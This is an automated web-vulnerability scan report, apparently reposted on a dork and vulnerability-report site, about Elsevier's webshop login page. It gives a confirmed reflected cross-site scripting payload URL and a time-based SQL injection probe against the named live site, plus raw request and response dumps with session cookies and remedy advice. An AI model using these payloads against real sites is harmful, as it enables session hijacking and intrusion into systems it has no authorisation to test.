webshop.elsevier.com, XSS, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading
Netsparker - Scan Report Summary
TARGET URL
 https://webshop.elsevier.com/login.cfm?d46
SCAN DATE
 5/2/2011 10:41:16 PM
REPORT DATE
 5/3/2011 12:08:55 AM
SCAN DURATION
 00:25:11

Total Requests

Average Speed

req/sec.
8
identified
5
confirmed
0
critical
3
informational

DORK TESTS

DORK TESTS
PROFILE
 Previous Settings
ENABLED ENGINES
 Blind SQL Injection, Boolean SQL Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
25 %
LOW
38 %
INFORMATION
38 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/login.cfm Query Based QUERYSTRING Cross-site Scripting Yes
Cookie Not Marked As Secure Yes
d46 GET Internal Server Error Yes
Auto Complete Enabled Yes
Cookie Not Marked As HttpOnly Yes
d46 GET E-mail Address Disclosure No
IIS Version Disclosure No
[Possible] Internal Path Leakage (Windows) No
Cross-site Scripting

Cross-site Scripting
1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /login.cfm

/login.cfm CONFIRMED

https://webshop.elsevier.com/login.cfm?'"--></style></script><script>alert(0x00003C)</script>

Parameters

Parameter Type Value
d46 GET
Query Based QUERYSTRING '"--></style></script><script>alert(0x00003C)</script>

Request

GET /login.cfm?'"--></style></script><script>netsparker(0x00003C)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: webshop.elsevier.com
Cookie: CFID=1230999; CFTOKEN=12747347; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 02 May 2011 22:44:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com -->
<!-- All rights reserved -->

<html>

<head><script type="text/javascript" src="/cfformscripts/cfform.js"></script><script type="text/javascript" src="/cfformscripts/masks.js"></script>
<link media="all" rel="stylesheet" type="text/css" href="/framework/css/all.css" />
<link rel="shortcut icon" href="/favicon.ico">
<!--[if lt IE 8]><link rel="stylesheet" type="text/css" href="/framework/css/ie.css" media="all" /><![endif]-->
<script type="text/javascript" src="/framework/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/framework/js/buttons-pressed.js"></script>
<script type="text/javascript" src="/framework/js/global.js"></script>

<script type="text/javascript" src="/framework/js/WOM.js"></script>
<script type="text/javascript" src="/framework/js/reflection.js"></script>

<!-- google sitemap -->
<meta name="google-site-verification" content="GiltWI_e197oUBamhGI45SQGaWNK4kt_EQ2RbSdQ86w" />



<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript"><!-- _CF_checkloginForm = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element login_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['login_mailto'].value, false)) { _CF_onError(_CF_this, "login_mailto", _CF_this['login_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //form element signup_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['signup_mailto'].value, false)) { _CF_onError(_CF_this, "signup_mailto", _CF_this['signup_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script>
<!--[if !(IE 7)]>
<!-- Start Visual Website Optimizer Code -->
<script type='text/javascript'>
var _vis_opt_account_id = 2736;
var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');
document.write('<script src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<script src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); } </script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); } </script>
<!-- End Visual Website Optimizer Code -->
</script>
<![endif]-->

<!-- Start Google Analytics code -->
<script type="text/javascript">
var _gaq=_gaq||[];
_gaq.push(['_setAccount','UA-18653561-1']);
</script>


<script type="text/javascript" src="/framework/cf/ga.cfm?site=webshop"></script>

<script type="text/javascript">
if(typeof(_vis_opt_GA_track) == "function") {
_vis_opt_GA_track();
}

_gaq.push(['_trackPageview', '/login']);

</script>

<script type="text/javascript">
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>

</head>

<body>

<div id="header">
<div class="header-content">
<div class="header-holder">
<h1 class="logo"><a href="/" title="Back to homepage" alt="Back to homepage">Elsevier</a></h1>
<div class="holder-menu">
<ul class="help">
<li><a href="/pages/support.html">Support & contact</a></li>
</ul>
<ul class="user-menu">

<li><a href="/login.cfm" rel="nofollow">Sign up</a></li>
<li><a href="/login.cfm" rel="nofollow">Login</a></li>

</ul>
</div>
</div>
<div class="header-holder">
<div id="webshop-holder-logo"><a href="/" title="Back to homepage" alt="Back to homepage"><img id="webshop-logo" src="/framework/gfx/logo_webshop.png" title="Back to homepage" alt="Back to homepage" border="0" /></a></div>
<div id="cart">

</div>
</div>
<div class="header-holder">
<div id="nav">
<div class="holder">
<div class="frame">
<ul>
<li>

<a class="home" href="/">

<strong>Home</strong>

</a>

</li>
<li>

<a class="" href="/myarticleservices/">

<strong>My Article Services</strong>

</a>

</li>
<li>

<a class="languageediting" href="/languageediting/">

<strong>Language Editing</strong>

</a>

</li>
<li>

<a class="" href="/illustrationservices/">

<strong>Illustration Services</strong>

</a>

</li>
<li>

<a class="subscription" href="/subscriptions/">

<strong>Subscriptions</strong>

</a>

</li>
<li>

<a class="specialcontent" href="/specialcontent/">

<strong>Special Content</strong>

</a>

</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>

<div id="main">

<div class="main-content">



<div id="content">





<ul class="breadcrumbs">

<li><a href="http://webshop.elsevier.com/"> Home </a></li>

<li> Login </li>

</ul>

<form name="loginForm" id="loginForm" action="/login.cfm?'"--></style></script><script>netsparker(0x00003C)</script>" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">

<div class="block">
<p>Existing Customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="login_mailto" id="login_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
Password
</div>
<div class="formfield">
<input name="password" id="password" type="password" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
&nbsp;
</div>
<div class="formfield">
<a href="http://webshop.elsevier.com/forgotpassword.html?return_url=%2Flogin%2Ecfm%3F%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00003C%29%3C%2Fscript%3E">+ Forgot your password?</a>
</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('returning_customer')"><span class="l"><em>Login</em></span><span class="r"></span></a>
</div>
</div>

<div class="block">
<p>New customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="signup_mailto" id="signup_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div style="clear:both;"></div>
<div class="row">
<input name="login_rua" type="checkbox" value="1" style="float:left;" id="login_rua" onkeyup="onKeyUpInput(this)" />
<div class="rua">

I have read and understand the <a href="http://webshop.elsevier.com/pages/registereduseragreement.html">Registered User Agreement</a>
and agree to be bound by all of its terms.

</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('new_customer')"><span class="l"><em>Create an account</em></span><span class="r"></span></a>
</div>
</div>

<input name="login_customertype" id="login_customertype" type="hidden" value="returning_customer" /> <input name="target" id="target" type="hidden" value="http://webshop.elsevier.com/customer/mydesk.cfm" /> </form><script type="text/javascript">
function onClickButton(login_customertype) {
var theForm = document.forms['loginForm']
theForm.login_customertype.value = login_customertype
if (login_customertype == 'new_customer') {
theForm.target.value = 'http://webshop.elsevier.com/signup.cfm'
}
if (_CF_checkloginForm(theForm)){
theForm.submit()
}
}
function onKeyUpInput(elInput) {
if (event.keyCode == 13) {
if (elInput.name == 'login_mailto' || elInput.name == 'password') {
onClickButton('returning_customer')
} else if (elInput.name == 'signup_mailto' || elInput.name == 'login_rua') {
onClickButton('new_customer')
}
}
}
// focus on first form field
window.focus()
setTimeout("document.forms['loginForm'].elements['login_mailto'].focus()", 50)
</script>
<iframe name="actionFrame" src="/framework/empty.htm" style="width:100%; height:0px; visibility:hidden"></iframe>


</div>


</div>
</div>
<div id="footer">
<div class="footer-content">
<p>Copyright © 2011 <a href="http://www.elsevier.com">Elsevier B. V.</a> All rights reserved</p>
</div>
<div class="footer-list">
<div class="footer-content">
<strong class="logo-footer"><a href="http://webshop.elsevier.com/">Elsevier</a></strong>
<div class="box-list">
<div class="list">
<h3>Products & Services</h3><a href="http://webshop.elsevier.com/myarticleservices/journalissues/" target="_self">Journal issue</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/journalcoverposter" target="_self">Journal cover poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/articleposter" target="_self">Article poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/offprints/" target="_self">Article offprints</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/certificateofpublication" target="_self">Certificate of publication</a><br /><a href="http://webshop.elsevier.com/myarticleservices/booklets/?product_id=4556" target="_self">Personalized article book</a><br /><a href="http://webshop.elsevier.com/languageediting/" target="_self">Language editing</a><br /><a href="http://webshop.elsevier.com/illustrationservices" target="_self">Illustration services</a><br />
</div>
<div class="list">
<h3>Support</h3><a href="http://webshop.elsevier.com/pages/support.html" target="_self">Customer Service Contact</a><br /><a href="http://webshop.elsevier.com/pages/shippingdelivery.html" target="_self">Shipping Rates & Delivery</a><br /><a href="http://webshop.elsevier.com/pages/faq.html" target="_self">FAQ</a><br /><a href="http://webshop.elsevier.com/pages/termsofservice.html" target="_self">Terms of service</a><br />
</div>
<div class="list">
<h3>About Webshop</h3><a href="http://webshop.elsevier.com/pages/about.html" target="_self">About</a><br /><a href="http://webshop.elsevier.com/pages/productsandservices.html" target="_self">Products & Services</a><br /><a href="http://webshop.elsevier.com/pages/privacypolicy.html" target="_self">Privacy Policy</a><br /><a href="http://webshop.elsevier.com/pages/sitemap.html" target="_self">Sitemap</a><br />
</div>
<div class="list">
<h3>Login</h3><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign up</a><br /><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign in </a><br />
</div>
</div>
</div>
</div>
</div>
<div id="tempmsg"></div>



<!-- fire onload events -->
<script type="text/javascript">womOn()</script>
</body>
</html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure
1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /login.cfm

/login.cfm CONFIRMED

https://webshop.elsevier.com/login.cfm?d46

Identified Cookie

CFID

Request

GET /login.cfm?d46 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: webshop.elsevier.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=1230996;path=/,CFTOKEN=33337590;path=/,ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D;expires=Wed, 24-Apr-2041 22:41:17 GMT;path=/
Date: Mon, 02 May 2011 22:41:17 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- Developed by Ritense webtechnology -->
<!-- http://www.ritense.com -->
<!-- All rights reserved -->

<html>

<head><script type="text/javascript" src="/cfformscripts/cfform.js"></script><script type="text/javascript" src="/cfformscripts/masks.js"></script>
<link media="all" rel="stylesheet" type="text/css" href="/framework/css/all.css" />
<link rel="shortcut icon" href="/favicon.ico">
<!--[if lt IE 8]><link rel="stylesheet" type="text/css" href="/framework/css/ie.css" media="all" /><![endif]-->
<script type="text/javascript" src="/framework/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="/framework/js/buttons-pressed.js"></script>
<script type="text/javascript" src="/framework/js/global.js"></script>

<script type="text/javascript" src="/framework/js/WOM.js"></script>
<script type="text/javascript" src="/framework/js/reflection.js"></script>

<!-- google sitemap -->
<meta name="google-site-verification" content="GiltWI_e197oUBamhGI45SQGaWNK4kt_EQ2RbSdQ86w" />



<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript"><!-- _CF_checkloginForm = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element login_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['login_mailto'].value, false)) { _CF_onError(_CF_this, "login_mailto", _CF_this['login_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //form element signup_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['signup_mailto'].value, false)) { _CF_onError(_CF_this, "signup_mailto", _CF_this['signup_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script>
<!--[if !(IE 7)]>
<!-- Start Visual Website Optimizer Code -->
<script type='text/javascript'>
var _vis_opt_account_id = 2736;
var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');
document.write('<script src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<script src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); } </script>
<script type='text/javascript'> if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); } </script>
<!-- End Visual Website Optimizer Code -->
</script>
<![endif]-->

<!-- Start Google Analytics code -->
<script type="text/javascript">
var _gaq=_gaq||[];
_gaq.push(['_setAccount','UA-18653561-1']);
</script>


<script type="text/javascript" src="/framework/cf/ga.cfm?site=webshop"></script>

<script type="text/javascript">
if(typeof(_vis_opt_GA_track) == "function") {
_vis_opt_GA_track();
}

_gaq.push(['_trackPageview', '/login']);

</script>

<script type="text/javascript">
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>

</head>

<body>

<div id="header">
<div class="header-content">
<div class="header-holder">
<h1 class="logo"><a href="/" title="Back to homepage" alt="Back to homepage">Elsevier</a></h1>
<div class="holder-menu">
<ul class="help">
<li><a href="/pages/support.html">Support & contact</a></li>
</ul>
<ul class="user-menu">

<li><a href="/login.cfm" rel="nofollow">Sign up</a></li>
<li><a href="/login.cfm" rel="nofollow">Login</a></li>

</ul>
</div>
</div>
<div class="header-holder">
<div id="webshop-holder-logo"><a href="/" title="Back to homepage" alt="Back to homepage"><img id="webshop-logo" src="/framework/gfx/logo_webshop.png" title="Back to homepage" alt="Back to homepage" border="0" /></a></div>
<div id="cart">

</div>
</div>
<div class="header-holder">
<div id="nav">
<div class="holder">
<div class="frame">
<ul>
<li>

<a class="home" href="/">

<strong>Home</strong>

</a>

</li>
<li>

<a class="" href="/myarticleservices/">

<strong>My Article Services</strong>

</a>

</li>
<li>

<a class="languageediting" href="/languageediting/">

<strong>Language Editing</strong>

</a>

</li>
<li>

<a class="" href="/illustrationservices/">

<strong>Illustration Services</strong>

</a>

</li>
<li>

<a class="subscription" href="/subscriptions/">

<strong>Subscriptions</strong>

</a>

</li>
<li>

<a class="specialcontent" href="/specialcontent/">

<strong>Special Content</strong>

</a>

</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>

<div id="main">

<div class="main-content">



<div id="content">





<ul class="breadcrumbs">

<li><a href="http://webshop.elsevier.com/"> Home </a></li>

<li> Login </li>

</ul>

<form name="loginForm" id="loginForm" action="/login.cfm?d46" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)">

<div class="block">
<p>Existing Customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="login_mailto" id="login_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
Password
</div>
<div class="formfield">
<input name="password" id="password" type="password" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div class="row">
<div class="formfieldname">
&nbsp;
</div>
<div class="formfield">
<a href="http://webshop.elsevier.com/forgotpassword.html?return_url=%2Flogin%2Ecfm%3Fd46">+ Forgot your password?</a>
</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('returning_customer')"><span class="l"><em>Login</em></span><span class="r"></span></a>
</div>
</div>

<div class="block">
<p>New customer</p>
<div class="row">
<div class="formfieldname">
E-mail
</div>
<div class="formfield">
<input name="signup_mailto" id="signup_mailto" type="text" onkeyup="onKeyUpInput(this)" />
</div>
</div>
<div style="clear:both;"></div>
<div class="row">
<input name="login_rua" type="checkbox" value="1" style="float:left;" id="login_rua" onkeyup="onKeyUpInput(this)" />
<div class="rua">

I have read and understand the <a href="http://webshop.elsevier.com/pages/registereduseragreement.html">Registered User Agreement</a>
and agree to be bound by all of its terms.

</div>
</div>
<div class="btn-holder">
<a class="btn1 bw5" href="javascript:onClickButton('new_customer')"><span class="l"><em>Create an account</em></span><span class="r"></span></a>
</div>
</div>

<input name="login_customertype" id="login_customertype" type="hidden" value="returning_customer" /> <input name="target" id="target" type="hidden" value="http://webshop.elsevier.com/customer/mydesk.cfm" /> </form><script type="text/javascript">
function onClickButton(login_customertype) {
var theForm = document.forms['loginForm']
theForm.login_customertype.value = login_customertype
if (login_customertype == 'new_customer') {
theForm.target.value = 'http://webshop.elsevier.com/signup.cfm'
}
if (_CF_checkloginForm(theForm)){
theForm.submit()
}
}
function onKeyUpInput(elInput) {
if (event.keyCode == 13) {
if (elInput.name == 'login_mailto' || elInput.name == 'password') {
onClickButton('returning_customer')
} else if (elInput.name == 'signup_mailto' || elInput.name == 'login_rua') {
onClickButton('new_customer')
}
}
}
// focus on first form field
window.focus()
setTimeout("document.forms['loginForm'].elements['login_mailto'].focus()", 50)
</script>
<iframe name="actionFrame" src="/framework/empty.htm" style="width:100%; height:0px; visibility:hidden"></iframe>


</div>


</div>
</div>
<div id="footer">
<div class="footer-content">
<p>Copyright © 2011 <a href="http://www.elsevier.com">Elsevier B. V.</a> All rights reserved</p>
</div>
<div class="footer-list">
<div class="footer-content">
<strong class="logo-footer"><a href="http://webshop.elsevier.com/">Elsevier</a></strong>
<div class="box-list">
<div class="list">
<h3>Products & Services</h3><a href="http://webshop.elsevier.com/myarticleservices/journalissues/" target="_self">Journal issue</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/journalcoverposter" target="_self">Journal cover poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/articleposter" target="_self">Article poster</a><br /><a href="http://webshop.elsevier.com/myarticleservices/offprints/" target="_self">Article offprints</a><br /><a href="http://webshop.elsevier.com/myarticleservices/articlepublications/certificateofpublication" target="_self">Certificate of publication</a><br /><a href="http://webshop.elsevier.com/myarticleservices/booklets/?product_id=4556" target="_self">Personalized article book</a><br /><a href="http://webshop.elsevier.com/languageediting/" target="_self">Language editing</a><br /><a href="http://webshop.elsevier.com/illustrationservices" target="_self">Illustration services</a><br />
</div>
<div class="list">
<h3>Support</h3><a href="http://webshop.elsevier.com/pages/support.html" target="_self">Customer Service Contact</a><br /><a href="http://webshop.elsevier.com/pages/shippingdelivery.html" target="_self">Shipping Rates & Delivery</a><br /><a href="http://webshop.elsevier.com/pages/faq.html" target="_self">FAQ</a><br /><a href="http://webshop.elsevier.com/pages/termsofservice.html" target="_self">Terms of service</a><br />
</div>
<div class="list">
<h3>About Webshop</h3><a href="http://webshop.elsevier.com/pages/about.html" target="_self">About</a><br /><a href="http://webshop.elsevier.com/pages/productsandservices.html" target="_self">Products & Services</a><br /><a href="http://webshop.elsevier.com/pages/privacypolicy.html" target="_self">Privacy Policy</a><br /><a href="http://webshop.elsevier.com/pages/sitemap.html" target="_self">Sitemap</a><br />
</div>
<div class="list">
<h3>Login</h3><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign up</a><br /><a href="https://webshop.elsevier.com/login.cfm" target="_self">Sign in </a><br />
</div>
</div>
</div>
</div>
</div>
<div id="tempmsg"></div>



<!-- fire onload events -->
<script type="text/javascript">womOn()</script>
</body>
</html>
Internal Server Error

Internal Server Error
1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /login.cfm

/login.cfm CONFIRMED

https://webshop.elsevier.com/login.cfm?d46=(select+sleep(25))a--+1

Parameters

Parameter Type Value
d46 GET (select sleep(25))a-- 1

Request

GET /login.cfm?d46=(select+sleep(25))a--+1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: webshop.elsevier.com
Cookie: CFID=1230999; CFTOKEN=12747347; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 The request has exceeded the allowable time limit Tag: cfoutput
Transfer-Encoding: chunked
Content-Type: text/html
Server: Microsoft-IIS/7.0
server-error: true
Date: Mon, 02 May 2011 22:45:04 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>
<script type="text/javascript" src="/cfformscripts/cfform.js"></script><script type="text/javascript" src="/cfformscripts/masks.js"></script>
<title>Elsevier Webshop</title>
<meta name="description" content="Elsevier webshop." />
<meta name="keywords" content="Elsevier,webshop" />
<meta name="robots" content="noindex,nofollow" />
<script type="text/javascript"><!-- _CF_checkloginForm = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element login_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['login_mailto'].value, false)) { _CF_onError(_CF_this, "login_mailto", _CF_this['login_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //form element signup_mailto 'EMAIL' validation checks if (!_CF_checkEmail(_CF_this['signup_mailto'].value, false)) { _CF_onError(_CF_this, "signup_mailto", _CF_this['signup_mailto'].value, "Please enter a valid e-mail address."); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script><!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>

<font face="arial"></font>



<html>
<head>
<title>Error Occurred While Processing Request</title>


<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}

if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>


</head>
<body>

<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
